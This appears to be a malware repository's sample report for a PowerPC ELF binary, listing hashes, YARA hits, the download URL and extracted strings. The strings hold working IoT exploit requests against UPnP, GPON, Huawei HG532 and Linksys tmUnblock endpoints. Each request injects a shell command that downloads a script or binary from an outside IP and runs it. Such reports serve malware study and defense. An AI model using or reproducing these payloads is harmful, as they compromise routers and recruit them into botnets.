Sample details: 9e6dc9a05da76c362bd6261861b45a04 --

Hashes
MD5: 9e6dc9a05da76c362bd6261861b45a04
SHA1: fb9a58cd34522f5de1f5b59fcf866b45c678aeda
SHA256: a8a87c22efcd979f3af9a42ce246cc8ac51f2ff73c786cc53a88183336e95054
SSDEEP: 768:3aPNCnD2iXpQqy2nN3e3Kww8RhmGMlUykbG/v36qUGW90dMq/2syMX2EnwJwh2Qb:qPQXpq2g/iF3Krwz2EnM+2Q7f
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 |
Source
http://212.114.57.61/vb/xxx.ppc
Strings
		}#Kx9)
xTc808c
}i[x|k
 }$KxB
 }$KxB
:}VI.}6J
U) 6|	
+d9J+h})
TjF>Ti
Tk@.U)
9#+h}i
}#Kx9)+h/
|	y.9)
xU X(U)@.})
Uk@.U@
Cx})[x8
}#Kx9)	
}[Sx8	
xT	`&T
P*} HP9J
>TjF>/
KxTi@.|
}#Kx9)
}[Sx8	
T`X(}iJx|c
|iJxTc
X(}iJx
Jx|	JxT
+d9J+h})
>TjF>/
KxTi@.|
9#+h}i
}#Kx9)+h/
$}+Kx9k
>}(Kx/
}#Kx}e[x8
+x}%KxD
QJD.QJ
}#Kx8!
}#XP9)
 }CSx}e[x
}CSx}e[x
}e[x}CSx
}+HPU)
9)09U)
}FSx}i
}iXP= 
<|	:.p	
|	:.p	
})Zx9c
 POST /UD/?9 HTTP/1.1
User-Agent: OSIRIS
Content-Type: text/xml
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://212.114.57.611/z.sh -O - > lol.sh; chmod 777 lol.sh; sh lol.sh; rm lol.sh; iptables -A INPUT -p tcp --destination-port 5555 -j DROP`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /cdn-cgi/
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
U4POST /GponForm/diag_Form?images/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://212.114.57.61/kgg+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.114.58.61 -l /tmp/rk -r /vk/kgg; /bin/busybox chmod 777 * /tmp/rk; /tmp/rk huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
POST /tmUnblock.cgi HTTP/1.1
Host: 159.65.204.46:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+xxx.mpsl%3B+wget+http%3A%2F%2F159.65.204.46%2Fvb%2Fxxx.mpsl%3B+chmod+777+xxx.mpsl%3B+.%2Fxxx.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`wget http://159.65.204.46/kgg -O - > /var/xk;sh/var/xk realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
?/dev/null
.shstrtab
.rodata
.ctors
.dtors
.sdata